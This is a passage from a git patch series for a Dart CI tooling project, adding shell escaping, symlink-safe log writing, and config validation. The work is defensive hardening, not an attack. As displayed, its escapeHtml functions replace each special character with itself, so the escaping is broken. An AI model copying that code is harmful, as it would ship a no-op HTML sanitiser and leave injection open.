\n'; + final safeTitle = escapeHtml(title); + return '\n\n$safeTitle\n\n$content\n\n\n'; } /// Escape HTML special characters for safe embedding in GitHub markdown. static String escapeHtml(String input) { - return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); + return input + .replaceAll('&', '&') + .replaceAll('<', '<') + .replaceAll('>', '>') + .replaceAll('"', '"') + .replaceAll("'", '''); } /// Parse the NDJSON file produced by `dart test --file-reporter json:...`. diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index 52640f1..da67d3e 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -199,8 +199,8 @@ jobs: shell: bash run: | set -o pipefail - mkdir -p "$RUNNER_TEMP/test-logs" - dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + mkdir -p "$TEST_LOG_DIR" + dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs @@ -414,11 +414,12 @@ jobs: shell: bash run: | set -o pipefail - mkdir -p "$RUNNER_TEMP/test-logs" - dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + mkdir -p "$TEST_LOG_DIR" + dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs + PLATFORM_ID: ${{ matrix.platform_id }} - name: Upload test logs if: always() From 7e14b705ec19862584eca57f98f40f3c4cdf5386 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 20:44:14 -0500 Subject: [PATCH 07/16] sec: harden input validation, shell escaping, and symlink protection - Add _isSafeSecretIdentifier, _isSafeRunnerLabel, _isSafeSubPackageName validators for all Mustache-interpolated values - Validate secrets keys/values, pat_secret, line_length (numeric 1-10000), 
sub_packages name, and runner_overrides values - Reject hyphen-prefix and repo-root paths for sub_packages and web_test - Pin browser-actions/setup-chrome to SHA (v2.1.1) - Add -- end-of-options before web_test paths in skeleton - Shell-escape all interpolated values in manage_cicd.dart - Add RepoUtils: resolveTestLogDir, isSymlinkPath, ensureSafeDirectory, writeFileSafely for TEST_LOG_DIR safety - Wire WorkflowGenerator.validate() into validate command - Extract TestResultsUtil from StepSummary, add escapeHtml - Fix templates/config.json cross-validation (empty web_test: {}) - Add proto setup to web-test job, guard artifact upload with hashFiles - Add cli_utils_test.dart, expand workflow_generator_test.dart (214 tests) - Document path validation rules and cross-validation in SETUP.md Co-Authored-By: Claude Opus 4.6 --- SETUP.md | 35 +- docs/cli/API_REFERENCE.md | 4 + lib/src/cli/commands/test_command.dart | 21 +- lib/src/cli/commands/validate_command.dart | 24 ++ lib/src/cli/manage_cicd.dart | 181 +++------ lib/src/cli/utils/repo_utils.dart | 61 +++ lib/src/cli/utils/step_summary.dart | 245 +----------- lib/src/cli/utils/test_results_util.dart | 265 +++++++++++++ lib/src/cli/utils/workflow_generator.dart | 101 ++++- lib/src/triage/utils/config.dart | 9 + templates/config.json | 16 +- templates/github/workflows/ci.skeleton.yaml | 18 +- test/cli_utils_test.dart | 404 ++++++++++++++++++++ test/workflow_generator_test.dart | 394 ++++++++++++++++++- 14 files changed, 1380 insertions(+), 398 deletions(-) create mode 100644 lib/src/cli/utils/test_results_util.dart create mode 100644 test/cli_utils_test.dart diff --git a/SETUP.md b/SETUP.md index c011602..963d153 100644 --- a/SETUP.md +++ b/SETUP.md @@ -312,10 +312,10 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio | `features.analysis_cache` | bool | `false` | Cache analysis results across runs | | `features.managed_analyze` | bool | `false` | Run `dart analyze` via tooling | | 
`features.managed_test` | bool | `false` | Run `dart test` via tooling | -| `features.build_runner` | bool | `false` | Run `dart run build_runner build --delete-conflicting-outputs` before analyze, test, and web-test | +| `features.build_runner` | bool | `false` | Run `dart run build_runner build --delete-conflicting-outputs` before analyze, test, and web-test. In multi-platform mode this runs once in `analyze` and once per matrix `test` job. | | `features.web_test` | bool | `false` | Add a standalone `web-test` job that runs `dart test -p chrome` on Ubuntu | | `web_test.concurrency` | int | `1` | Number of concurrent browser test suites (1–32) | -| `web_test.paths` | list | `[]` | Specific test paths to run (empty = run all tests via `dart test -p chrome`) | +| `web_test.paths` | list | `[]` | Specific test paths to run (empty = run all tests via `dart test -p chrome`). Paths are strictly validated (rules below). | | `platforms` | list | `["ubuntu"]` | Platform matrix. If 2+ entries, CI runs `analyze` once then `test` as a matrix. Valid: `ubuntu-x64`, `ubuntu-arm64`, `macos-arm64`, `macos-x64`, `windows-x64`, `windows-arm64` (plus aliases `ubuntu`, `macos`, `windows`). | | `runner_overrides` | object | `{}` | Override platform IDs to custom `runs-on` labels (e.g. org-managed GitHub-hosted runners). Example: `{ "ubuntu-arm64": "runtime-ubuntu-24.04-arm64-208gb-64core" }` | | `secrets` | object | `{}` | Additional secrets as `{ "ENV_NAME": "SECRET_NAME" }` | @@ -323,6 +323,15 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio When `features.web_test` is `true`, the `web_test` object is optional; if omitted, defaults are used (`concurrency: 1`, `paths: []`). +`web_test.paths` validation rules: +- Entries must be non-empty strings with no leading/trailing whitespace. +- Paths must be relative (no absolute paths, no `~`, no traversal like `..`). +- Paths must use forward slashes (`/`) and only `[A-Za-z0-9_./-]` characters. 
+- `.` (repo root), duplicates (after normalization), and leading `-` are rejected. + +Cross-validation rule: +- If `features.web_test` is `false`, omit `web_test` or set it to `{}`. Non-empty `web_test` config with the feature disabled is treated as dead config and fails validation. + You can add custom steps before/after tests using user-preservable sections in the generated workflow — look for `# --- BEGIN USER: pre-test ---` and `# --- END USER: post-test ---` markers. To add additional jobs (including reusable workflow calls), @@ -413,6 +422,7 @@ The `validate` command checks: - TOML files contain required `prompt` and `description` keys - Dart files pass `dart analyze` - Markdown files exist and are non-empty +- `.runtime_ci/config.json` `ci` semantics via `WorkflowGenerator.validate()` (field rules + cross-validation such as `features.web_test` vs `web_test`) The `status` command shows: - Installation status of all required/optional tools @@ -455,13 +465,18 @@ The `.runtime_ci/config.json` file controls all behavior. Here is the complete s }, "cross_repo": { "enabled": true, + "orgs": ["your-org"], "repos": [ { "owner": "your-org", "repo": "dependent-repo", "relationship": "dependency" } - ] + ], + "discovery": { + "enabled": true, + "search_orgs": ["your-org"] + } }, "labels": { "type": ["bug", "feature-request", "enhancement", "documentation", "question"], @@ -514,6 +529,15 @@ The `.runtime_ci/config.json` file controls all behavior. 
Here is the complete s | `changelog_path` | `String` | `"CHANGELOG.md"` | Path to the CHANGELOG file | | `release_notes_path` | `String` | `"release_notes"` | Directory for release notes artifacts | +#### `sentry` + +| Key | Default | Description | +|---|---|---| +| `organization` | `""` | Sentry organization slug | +| `projects` | `[]` | List of Sentry project slugs to scan | +| `scan_on_pre_release` | `true` | Whether to scan Sentry errors during pre-release | +| `recent_errors_hours` | `168` | Hours of recent errors to include (168 = 7 days) | + #### `thresholds` Controls automated triage actions based on aggregated agent confidence: @@ -550,9 +574,12 @@ Available agents: `code_analysis`, `pr_correlation`, `duplicate`, `sentiment`, ` | Key | Default | Description | |---|---|---| | `enabled` | `true` | Enable cross-repository issue discovery and linking | +| `orgs` | `[]` | Optional allowlist of organizations for cross-repo operations | | `repos` | `[]` | List of dependent repositories to scan | +| `discovery.enabled` | `true` | Enable automatic discovery of related repositories | +| `discovery.search_orgs` | `[]` | Organizations scanned when discovery is enabled | -Each repo entry: `{ "owner": "...", "repo": "...", "relationship": "dependency|consumer|..." }` +Each repo entry: `{ "owner": "...", "repo": "...", "relationship": "dependency|consumer|related|..." }`. The default relationship is `related` when omitted. --- diff --git a/docs/cli/API_REFERENCE.md b/docs/cli/API_REFERENCE.md index 7acdd5b..8673faa 100644 --- a/docs/cli/API_REFERENCE.md +++ b/docs/cli/API_REFERENCE.md @@ -275,7 +275,11 @@ if (isGitInstalled) { - `compareLink(String prevTag, String newTag, [String? 
label])`: `static String` - `ghLink(String label, String path)`: `static String` - `releaseLink(String tag)`: `static String` + - `escapeHtml(String input)`: `static String` - `collapsible(String title, String content, {bool open = false})`: `static String` +- **TestResultsUtil** + - `parseTestResultsJson(String jsonPath)`: `static TestResults` + - `writeTestJobSummary(TestResults results, int exitCode)`: `static void` - **TemplateResolver** - `resolvePackageRoot()`: `static String` - `resolveTemplatesDir()`: `static String` diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index cbef56a..cf13209 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -9,6 +9,7 @@ import '../../triage/utils/config.dart'; import '../utils/logger.dart'; import '../utils/repo_utils.dart'; import '../utils/step_summary.dart'; +import '../utils/test_results_util.dart'; import '../utils/sub_package_utils.dart'; /// Run `dart test` on the root package and all configured sub-packages with @@ -44,11 +45,15 @@ class TestCommand extends Command { final failures = []; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = Platform.environment['TEST_LOG_DIR'] ?? 
p.join(repoRoot, '.dart_tool', 'test-logs'); + late final String logDir; try { - Directory(logDir).createSync(recursive: true); + logDir = RepoUtils.resolveTestLogDir(repoRoot); + RepoUtils.ensureSafeDirectory(logDir); + } on StateError catch (e) { + Logger.error('$e'); + exit(1); } on FileSystemException catch (e) { - Logger.error('Cannot create log directory $logDir: $e'); + Logger.error('Cannot use log directory: $e'); exit(1); } Logger.info('Log directory: $logDir'); @@ -118,19 +123,19 @@ class TestCommand extends Command { // Write console output to log files try { - File(p.join(logDir, 'dart_stdout.log')).writeAsStringSync(stdoutBuf.toString()); + RepoUtils.writeFileSafely(p.join(logDir, 'dart_stdout.log'), stdoutBuf.toString()); if (stderrBuf.isNotEmpty) { - File(p.join(logDir, 'dart_stderr.log')).writeAsStringSync(stderrBuf.toString()); + RepoUtils.writeFileSafely(p.join(logDir, 'dart_stderr.log'), stderrBuf.toString()); } } on FileSystemException catch (e) { Logger.warn('Could not write log files: $e'); } // Parse the JSON results file for structured test data - final results = StepSummary.parseTestResultsJson(jsonPath); + final results = TestResultsUtil.parseTestResultsJson(jsonPath); // Generate and write the rich job summary - StepSummary.writeTestJobSummary(results, exitCode); + TestResultsUtil.writeTestJobSummary(results, exitCode); if (exitCode != 0) { Logger.error('Root tests failed with exit code $exitCode'); @@ -211,7 +216,7 @@ class TestCommand extends Command { if (failures.isNotEmpty) { Logger.error('Tests failed for ${failures.length} package(s): ${failures.join(', ')}'); - final failureBullets = failures.map((name) => '- `$name`').join('\n'); + final failureBullets = failures.map((name) => '- `${StepSummary.escapeHtml(name)}`').join('\n'); StepSummary.write('\n## Sub-package Test Failures\n\n$failureBullets\n'); exit(1); } diff --git a/lib/src/cli/commands/validate_command.dart b/lib/src/cli/commands/validate_command.dart index 
8eed099..0ba1ce1 100644 --- a/lib/src/cli/commands/validate_command.dart +++ b/lib/src/cli/commands/validate_command.dart @@ -8,6 +8,7 @@ import '../../triage/utils/config.dart'; import '../utils/ci_constants.dart'; import '../utils/logger.dart'; import '../utils/repo_utils.dart'; +import '../utils/workflow_generator.dart'; /// Validate all configuration files. class ValidateCommand extends Command { @@ -88,6 +89,29 @@ class ValidateCommand extends Command { } } + Logger.info(''); + Logger.info('Checking semantic CI config...'); + try { + final ciConfig = WorkflowGenerator.loadCiConfig(repoRoot); + if (ciConfig == null) { + Logger.info('No .runtime_ci/config.json ci section found — skipping semantic CI validation'); + } else { + final ciErrors = WorkflowGenerator.validate(ciConfig); + if (ciErrors.isEmpty) { + Logger.success('Valid CI config semantics: .runtime_ci/config.json#ci'); + } else { + Logger.error('Invalid CI config semantics: .runtime_ci/config.json#ci'); + for (final err in ciErrors) { + Logger.error(' - $err'); + } + allValid = false; + } + } + } on StateError catch (e) { + Logger.error('$e'); + allValid = false; + } + // Validate Stage 1 artifacts Logger.info(''); Logger.info('Checking Stage 1 artifacts from previous runs...'); diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 5534b67..69156f9 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -5,6 +5,7 @@ import 'dart:io'; import '../triage/utils/run_context.dart'; import '../triage/utils/config.dart'; +import 'commands/test_command.dart'; import 'options/manage_cicd_options.dart'; import 'utils/step_summary.dart'; @@ -431,7 +432,7 @@ Future _runExplore(String repoRoot) async { _error('Ensure runtime_ci_tooling is properly installed (dart pub get).'); exit(1); } - final prompt = _runSync('dart run $promptScriptPath "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync('dart run $promptScriptPath ${_shellEscape(prevTag)} 
${_shellEscape(newVersion)}', repoRoot); if (prompt.isEmpty) { _error('Prompt generator produced empty output. Check $promptScriptPath'); exit(1); @@ -451,7 +452,7 @@ Future _runExplore(String repoRoot) async { 'sh', [ '-c', - 'cat $promptPath | gemini ' + 'cat ${_shellEscape(promptPath)} | gemini ' '-o json --yolo ' '-m $kGeminiProModel ' "--allowed-tools 'run_shell_command(git),run_shell_command(gh)'", @@ -586,7 +587,7 @@ Future _runCompose(String repoRoot) async { _error('Prompt script not found: $composerScript'); exit(1); } - final prompt = _runSync('dart run $composerScript "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync('dart run $composerScript ${_shellEscape(prevTag)} ${_shellEscape(newVersion)}', repoRoot); if (prompt.isEmpty) { _error('Composer prompt generator produced empty output.'); exit(1); @@ -635,11 +636,11 @@ Future _runCompose(String repoRoot) async { 'sh', [ '-c', - 'cat $promptPath | gemini ' + 'cat ${_shellEscape(promptPath)} | gemini ' '-o json --yolo ' '-m $kGeminiProModel ' "--allowed-tools 'run_shell_command(git),run_shell_command(gh)' " - '${includes.join(" ")}', + '${includes.map(_shellEscape).join(" ")}', ], workingDirectory: repoRoot, environment: {...Platform.environment}, @@ -805,7 +806,10 @@ Future _runReleaseNotes(String repoRoot) async { _error('Prompt script not found: $rnScript'); exit(1); } - final prompt = _runSync('dart run $rnScript "$prevTag" "$newVersion" "$bumpType"', repoRoot); + final prompt = _runSync( + 'dart run $rnScript ${_shellEscape(prevTag)} ${_shellEscape(newVersion)} ${_shellEscape(bumpType)}', + repoRoot, + ); if (prompt.isEmpty) { _error('Release notes prompt generator produced empty output.'); exit(1); @@ -849,12 +853,12 @@ Future _runReleaseNotes(String repoRoot) async { 'sh', [ '-c', - 'cat $promptPath | gemini ' + 'cat ${_shellEscape(promptPath)} | gemini ' '-o json --yolo ' '-m $kGeminiProModel ' // Expanded tool access: git, gh, AND shell commands for reading files "--allowed-tools 
'run_shell_command(git),run_shell_command(gh),run_shell_command(cat),run_shell_command(head),run_shell_command(tail)' " - '${includes.join(" ")}', + '${includes.map(_shellEscape).join(" ")}', ], workingDirectory: repoRoot, environment: {...Platform.environment}, @@ -977,7 +981,7 @@ List> _gatherVerifiedContributors(String repoRoot, String pr // Step 1: Get one commit SHA per unique author email in the release range final gitResult = Process.runSync('sh', [ '-c', - 'git log "$prevTag"..HEAD --format="%H %ae" --no-merges | sort -u -k2,2', + 'git log ${_shellEscape(prevTag)}..HEAD --format="%H %ae" --no-merges | sort -u -k2,2', ], workingDirectory: repoRoot); if (gitResult.exitCode != 0) { @@ -1358,7 +1362,7 @@ Future _generateAutodocFile({ if (libDir.isNotEmpty) promptArgs.add(libDir); if (docType == 'migration' && previousHash.isNotEmpty) promptArgs.add(previousHash); - final prompt = _runSync('dart run $repoRoot/$templatePath ${promptArgs.map((a) => '"$a"').join(' ')}', repoRoot); + final prompt = _runSync('dart run $repoRoot/$templatePath ${promptArgs.map(_shellEscape).join(' ')}', repoRoot); if (prompt.isEmpty) { _warn(' [$moduleId] Empty prompt for $docType, skipping'); @@ -1399,7 +1403,10 @@ Do not skip any -- completeness is more important than brevity. 
final pass1Result = Process.runSync( 'sh', - ['-c', 'cat ${pass1Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], + [ + '-c', + 'cat ${_shellEscape(pass1Prompt.path)} | gemini --yolo -m $kGeminiProModel ${includes.map(_shellEscape).join(" ")}', + ], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1488,7 +1495,10 @@ Write the corrected file to the same path: $absOutputFile final pass2Result = Process.runSync( 'sh', - ['-c', 'cat ${pass2Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], + [ + '-c', + 'cat ${_shellEscape(pass2Prompt.path)} | gemini --yolo -m $kGeminiProModel ${includes.map(_shellEscape).join(" ")}', + ], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1514,7 +1524,7 @@ Write the corrected file to the same path: $absOutputFile /// Compute SHA256 hash of all source files in the given paths. String _computeModuleHash(String repoRoot, List sourcePaths) { // Use git to compute a hash of the directory contents - final paths = sourcePaths.map((p) => '$repoRoot/$p').join(' '); + final paths = sourcePaths.map((p) => _shellEscape('$repoRoot/$p')).join(' '); final result = Process.runSync('sh', [ '-c', 'find $paths -type f \\( -name "*.proto" -o -name "*.dart" \\) 2>/dev/null | sort | xargs cat 2>/dev/null | sha256sum | cut -d" " -f1', @@ -1816,8 +1826,11 @@ Future _runDetermineVersion(String repoRoot, List args) async { _success('Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md'); } else { // Generate basic rationale - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); - final commits = _runSync('git log "$prevTag"..HEAD --oneline --no-merges 2>/dev/null | head -20', repoRoot); + final commitCount = _runSync('git rev-list --count ${_shellEscape(prevTag)}..HEAD 2>/dev/null', repoRoot); + final commits = _runSync( + 'git log ${_shellEscape(prevTag)}..HEAD --oneline --no-merges 2>/dev/null | head -20', + 
repoRoot, + ); File(targetPath).writeAsStringSync( '# Version Bump: v$newVersion\n\n' '**Date**: ${DateTime.now().toUtc().toIso8601String()}\n' @@ -2152,105 +2165,8 @@ ${_artifactLink()} /// /// All log files are written to [logDir] (`$TEST_LOG_DIR` in CI, or /// `/.dart_tool/test-logs/` locally). -Future _runTest(String repoRoot) async { - _header('Running Tests'); - - // Skip gracefully if no test/ directory exists - final testDir = Directory('$repoRoot/test'); - if (!testDir.existsSync()) { - _success('No test/ directory found — skipping tests'); - _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); - return; - } - - // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; - try { - Directory(logDir).createSync(recursive: true); - } on FileSystemException catch (e) { - _error('Cannot create log directory $logDir: $e'); - exit(1); - } - - final jsonPath = '$logDir/results.json'; - final expandedPath = '$logDir/expanded.txt'; - - // Build test arguments with two file reporters + expanded console output - final testArgs = [ - 'test', - '--exclude-tags', - 'gcp,integration', - '--chain-stack-traces', - '--reporter', - 'expanded', - '--file-reporter', - 'json:$jsonPath', - '--file-reporter', - 'expanded:$expandedPath', - ]; - - _info('Log directory: $logDir'); - _info('Running: dart ${testArgs.join(' ')}'); - - // Use Process.start with piped output so we can both stream to console - // AND capture the full output for summary generation. 
- final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); - - // Stream stdout and stderr to console in real-time while capturing - final stdoutBuf = StringBuffer(); - final stderrBuf = StringBuffer(); - - final stdoutSub = process.stdout.transform(utf8.decoder).listen((data) { - stdout.write(data); - stdoutBuf.write(data); - }); - final stderrSub = process.stderr.transform(utf8.decoder).listen((data) { - stderr.write(data); - stderrBuf.write(data); - }); - - final stdoutDone = stdoutSub.asFuture(); - final stderrDone = stderrSub.asFuture(); - - // Wait for process to exit (45-min safety timeout) - const processTimeout = Duration(minutes: 45); - final exitCode = await process.exitCode.timeout( - processTimeout, - onTimeout: () { - _error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - process.kill(); // No signal arg — cross-platform safe - return -1; - }, - ); - try { - await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); - } catch (_) { - // Process killed or streams timed out — cancel subscriptions to avoid leaks - await stdoutSub.cancel(); - await stderrSub.cancel(); - } - - // Parse the JSON results file for structured test data - final results = StepSummary.parseTestResultsJson(jsonPath); - - // Write console output to log file as well (supplements shell-level tee) - try { - File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); - if (stderrBuf.isNotEmpty) { - File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); - } - } on FileSystemException catch (e) { - _warn('Could not write log files: $e'); - } - - // Generate and write the rich job summary - StepSummary.writeTestJobSummary(results, exitCode); - - if (exitCode != 0) { - _error('Tests failed (exit code $exitCode)'); - exit(exitCode); - } - _success('All tests passed'); +Future _runTest(String _) async { + await TestCommand().run(); } /// Run dart analyze and 
fail only on actual errors. @@ -2379,7 +2295,7 @@ Future _runDocumentation(String repoRoot) async { _error('Prompt script not found: $docScript'); exit(1); } - final prompt = _runSync('dart run $docScript "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync('dart run $docScript ${_shellEscape(prevTag)} ${_shellEscape(newVersion)}', repoRoot); if (prompt.isEmpty) { _error('Documentation prompt generator produced empty output.'); exit(1); @@ -2407,11 +2323,11 @@ Future _runDocumentation(String repoRoot) async { 'sh', [ '-c', - 'cat $promptPath | gemini ' + 'cat ${_shellEscape(promptPath)} | gemini ' '-o json --yolo ' '-m $kGeminiProModel ' "--allowed-tools 'run_shell_command(git),run_shell_command(gh),run_shell_command(cat),run_shell_command(head)' " - '${includes.join(" ")}', + '${includes.map(_shellEscape).join(" ")}', ], workingDirectory: repoRoot, environment: {...Platform.environment}, @@ -2832,8 +2748,11 @@ String _detectNextVersion(String repoRoot, String prevTag) { var patch = int.tryParse(parts[2]) ?? 
0; // ── Pass 1: Fast regex heuristic (fallback if Gemini unavailable) ── - final commits = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s%n%b" 2>/dev/null', repoRoot); - final commitSubjects = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', repoRoot); + final commits = _runSync('git log ${_shellEscape(prevTag)}..HEAD --pretty=format:"%s%n%b" 2>/dev/null', repoRoot); + final commitSubjects = _runSync( + 'git log ${_shellEscape(prevTag)}..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', + repoRoot, + ); var bump = 'patch'; if (RegExp(r'(BREAKING CHANGE|^[a-z]+(\(.+\))?!:)', multiLine: true).hasMatch(commits)) { @@ -2855,9 +2774,12 @@ String _detectNextVersion(String repoRoot, String prevTag) { // ── Pass 2: Gemini analysis (authoritative, overrides regex if available) ── if (_commandExists('gemini') && Platform.environment['GEMINI_API_KEY'] != null) { - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); - final changedFiles = _runSync('git diff --name-only "$prevTag"..HEAD 2>/dev/null | head -30', repoRoot); - final diffStat = _runSync('git diff --stat "$prevTag"..HEAD 2>/dev/null | tail -5', repoRoot); + final commitCount = _runSync('git rev-list --count ${_shellEscape(prevTag)}..HEAD 2>/dev/null', repoRoot); + final changedFiles = _runSync( + 'git diff --name-only ${_shellEscape(prevTag)}..HEAD 2>/dev/null | head -30', + repoRoot, + ); + final diffStat = _runSync('git diff --stat ${_shellEscape(prevTag)}..HEAD 2>/dev/null | tail -5', repoRoot); final existingTags = _runSync("git tag -l 'v*' --sort=-version:refname | head -10", repoRoot); final commitSummary = commits.split('\n').take(50).join('\n'); @@ -2904,7 +2826,7 @@ String _detectNextVersion(String repoRoot, String prevTag) { final promptPath = '${versionAnalysisDir.path}/prompt.txt'; File(promptPath).writeAsStringSync(prompt); final geminiResult = _runSync( - 'cat $promptPath | gemini ' + 'cat ${_shellEscape(promptPath)} | 
gemini ' '-o json --yolo ' '-m $kGeminiProModel ' "--allowed-tools 'run_shell_command(git),run_shell_command(gh)' " @@ -3096,7 +3018,7 @@ String _buildReleaseCommitMessage({ } // Commit range - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); + final commitCount = _runSync('git rev-list --count ${_shellEscape(prevTag)}..HEAD 2>/dev/null', repoRoot); buf.writeln('---'); buf.writeln('Automated release by CI/CD pipeline (Gemini CLI + GitHub Actions)'); buf.writeln('Commits since $prevTag: $commitCount'); @@ -3115,6 +3037,17 @@ bool _commandExists(String command) { } } +/// Escapes a string for safe interpolation into a shell command. +/// +/// Uses POSIX single-quote style: the value is wrapped in single quotes, and +/// any single quotes within are escaped as `'"'"'` (end quote, literal quote, +/// start quote). This prevents shell injection when user-controlled values +/// (prevTag, newVersion, bumpType, promptArgs, paths, etc.) are interpolated +/// into _runSync or Process.runSync shell commands. +String _shellEscape(String s) { + return "'${s.replaceAll("'", "'\"'\"'")}'"; +} + String _runSync(String command, String workingDirectory) { if (_verbose) _info('[CMD] $command'); final result = Process.runSync('sh', ['-c', command], workingDirectory: workingDirectory); diff --git a/lib/src/cli/utils/repo_utils.dart b/lib/src/cli/utils/repo_utils.dart index 2cf90e1..57aea2b 100644 --- a/lib/src/cli/utils/repo_utils.dart +++ b/lib/src/cli/utils/repo_utils.dart @@ -1,9 +1,13 @@ import 'dart:io'; +import 'package:path/path.dart' as p; + import '../../triage/utils/config.dart'; /// Utilities for finding and working with the repository root. abstract final class RepoUtils { + static final RegExp _controlChars = RegExp(r'[\r\n\t\x00-\x1f]'); + /// Find the repository root by walking up and looking for pubspec.yaml /// with the matching package name from config. static String? 
findRepoRoot() { @@ -22,4 +26,61 @@ abstract final class RepoUtils { } return null; } + + /// Resolve and validate the test log directory. + /// + /// - Defaults to `/.dart_tool/test-logs` when TEST_LOG_DIR is unset. + /// - If TEST_LOG_DIR is provided, it must be an absolute path and (when + /// RUNNER_TEMP is set) must stay within RUNNER_TEMP. + static String resolveTestLogDir(String repoRoot, {Map? environment}) { + final env = environment ?? Platform.environment; + final defaultDir = p.join(repoRoot, '.dart_tool', 'test-logs'); + final raw = env['TEST_LOG_DIR']; + if (raw == null) return defaultDir; + + final trimmed = raw.trim(); + if (trimmed.isEmpty) return defaultDir; + if (_controlChars.hasMatch(trimmed)) { + throw StateError('TEST_LOG_DIR must not contain newlines or control characters'); + } + + final normalized = p.normalize(trimmed); + if (!p.isAbsolute(normalized)) { + throw StateError('TEST_LOG_DIR must be an absolute path'); + } + + final runnerTempRaw = env['RUNNER_TEMP']?.trim(); + if (runnerTempRaw != null && runnerTempRaw.isNotEmpty) { + final runnerTemp = p.normalize(runnerTempRaw); + if (!(normalized == runnerTemp || p.isWithin(runnerTemp, normalized))) { + throw StateError('TEST_LOG_DIR must be within RUNNER_TEMP: "$runnerTemp"'); + } + } + + return normalized; + } + + /// Return true when the path itself is a symlink. + static bool isSymlinkPath(String path) { + return FileSystemEntity.typeSync(path, followLinks: false) == FileSystemEntityType.link; + } + + /// Create a directory if needed, and refuse symlink-backed paths. + static void ensureSafeDirectory(String dirPath) { + if (isSymlinkPath(dirPath)) { + throw FileSystemException('Refusing to use symlink directory', dirPath); + } + Directory(dirPath).createSync(recursive: true); + if (isSymlinkPath(dirPath)) { + throw FileSystemException('Refusing to use symlink directory', dirPath); + } + } + + /// Write file content while refusing symlink targets. 
+ static void writeFileSafely(String filePath, String content, {FileMode mode = FileMode.write}) { + if (isSymlinkPath(filePath)) { + throw FileSystemException('Refusing to write through symlink', filePath); + } + File(filePath).writeAsStringSync(content, mode: mode); + } } diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 0208207..747e571 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -1,35 +1,8 @@ -import 'dart:convert'; import 'dart:io'; import '../../triage/utils/config.dart'; import 'logger.dart'; - -/// A single failed test record parsed from the JSON reporter output. -class TestFailure { - final String name; - final String error; - final String stackTrace; - final String printOutput; - final int durationMs; - - TestFailure({ - required this.name, - required this.error, - required this.stackTrace, - required this.printOutput, - required this.durationMs, - }); -} - -/// Parsed aggregate test results from the NDJSON file reporter. -class TestResults { - int passed = 0; - int failed = 0; - int skipped = 0; - int totalDurationMs = 0; - final List failures = []; - bool parsed = false; -} +import 'repo_utils.dart'; /// Step summary utilities for GitHub Actions. abstract final class StepSummary { @@ -41,14 +14,22 @@ abstract final class StepSummary { /// Skips appending if the file would exceed the 1 MiB GitHub limit. static void write(String markdown) { final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; - if (summaryFile == null) return; + if (summaryFile == null || summaryFile.trim().isEmpty) return; + if (RepoUtils.isSymlinkPath(summaryFile)) { + Logger.warn('Refusing to write step summary through symlink: $summaryFile'); + return; + } final file = File(summaryFile); final currentSize = file.existsSync() ? 
file.lengthSync() : 0; if (currentSize + markdown.length > _maxSummaryBytes) { Logger.warn('Step summary approaching 1 MiB limit — skipping append'); return; } - file.writeAsStringSync(markdown, mode: FileMode.append); + try { + RepoUtils.writeFileSafely(summaryFile, markdown, mode: FileMode.append); + } on FileSystemException catch (e) { + Logger.warn('Could not write step summary: $e'); + } } /// Build a link to the current workflow run's artifacts page. @@ -100,208 +81,4 @@ abstract final class StepSummary { .replaceAll('"', '"') .replaceAll("'", '''); } - - /// Parse the NDJSON file produced by `dart test --file-reporter json:...`. - static TestResults parseTestResultsJson(String jsonPath) { - final results = TestResults(); - final file = File(jsonPath); - if (!file.existsSync()) { - Logger.warn('No JSON results file found at $jsonPath'); - return results; - } - - results.parsed = true; - - final testNames = {}; - final testStartTimes = {}; - final testErrors = {}; - final testStackTraces = {}; - final testPrints = {}; - - final 